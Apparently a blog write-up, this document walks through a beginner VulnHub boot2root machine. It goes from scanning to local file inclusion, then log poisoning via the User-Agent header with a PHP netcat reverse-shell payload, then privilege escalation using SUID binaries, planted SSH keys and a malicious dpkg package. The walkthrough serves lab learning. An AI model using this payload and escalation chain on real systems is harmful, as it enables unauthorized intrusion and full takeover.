In this article we are going to solve another boot2root challenge . This is a beginner level challenge . We can download this box from vulnhhub.
So as usual we are going to find the IP address of the target using the command : sudo netdiscover -i wlan0
Now by using the command nmap -A 192.168.43.45 we checked for the open ports and services running in the system.
As we can see that only 2 ports are open . So we decided to enumerate HTTP service , and the website has a very cool image in it that says website is closed . So we start enumerating more using directory bruteforce , command used : sudo dirb http://192.168.43.45
Now one by one we decided to open every webpage .
So now we have 3 entries in this file and we decided to open them. In the webpage /?include=info we found that it is vulnerable to LFI .
So now we tried to read different files in the system if we can get something useful but we found nothing . This is a LFI vulnerability and we can use log poisoning attack and from there we can have a reverse shell.
But to perform log poisoning attack we should be able to include some files like access.log or auth.log . So we decided to again run the directory bruteforce using dirbuster with extension php and we found the webpage /log.php
so we decided to open this file and found very interesting file in the very first line.
So now we have the path of access.log file and from here we can perform log poisoning attack!
So now we decided to open the file /var/www/html/access.log using LFI vulnerability .
Now we intercept the packet using burp suite , and to perform log poisoning attack we can tamper the User-Agent parameter and can inject our code there!
As we can see here that to take reverse shell we have injected our php code in User-Agent and now we have the reverse shell
code : <?php echo shell_exec('nc -e /bin/bash <your ip> <open port>'); ?>
Now we have our reverse shell and by using python-one-liner we get a shell.
Now privilege escalation part.
by typing ls we can see different files present in this directory and we found a interesting file secret.php and using the command cat secret.php we check its content and found the password of user victor in md5 hash format we decided to crack it and found the password to be irminsul .
Now we are in as user victor and we checked for the privileges using the command sudo -l but nothing was there . So we decided to check for SUID binary using the command : find / -perm -u=s -type f 2>/dev/null
/home/victor/bin/find is very helpful for us we change our directory to /home/victor/bin/find
As described in the gtfobins we can use this for privilege escalation . now we use the trick from gtfobins and we are in as user john
now we change our directory to /home/john and there we found a file with name .private and we checked the content of this file and we found text dropbox2010
we use this as the password for user lisa and succeed in login as user lisa.
Now we again check for the SUID binary using the same command and again we have a interesting binary inside the directory /home/lisa/bin/
now there are many methods for privilege escalation using copy binary but here we succeed with the method :
change directory to /tmp
create two files as id_rsa.pub and id_rsa
use ssh-keygen to generate new key pairs
copy id_rsa.pub to /home/henri/.ssh/authorized_keys
connect to ssh as user henri by using id_rsa file.
Now copy the id_rsa.pub to /home/henri/.ssh/authorized_keys and change the permission of id_rsa using the command chmod 400 id_rsa and then connect to ssh as user henri.
we are in as henri , and we check the home directory of this user and found two things.
dust directory was empty so we decided to check for the SUID binary and found this.
now we change our directory to /usr/local/bin and there we have the SUID binary which is owned by the root , we execute this using ./cmd and we are in as user trevor
Now this time we checked for the user privileges using the command sudo -l and found very interesting result.
we again take the help of gtfobins and found that we can use this for privilege escalation and can take the shell of user root!
now we need x_1.0_all.deb package to install and for that we use our kali linux machine and build this .deb package and transfer this to the target machine .
Now we downloaded this package in the target machine using wget command.
now install the package using the command sudo -u root /usr/bin/dpkg -i x_1.0_all.deb ,and we are in as user root!
Now let us read the final flag by executing this command .
Yipee!! finally the challenge is completed!
NOTE : This is the intended way to solve this machine . Second method is to bruteforce the password of user trevor and then follow the dpkg part and get the root in an easy way! but following the first approach is very beneficial for us.
If we follow the approach described in this article then I will rate this machine is as intermediate level for a beginner in CTF challenge because there are many things to learn for privilege escalation.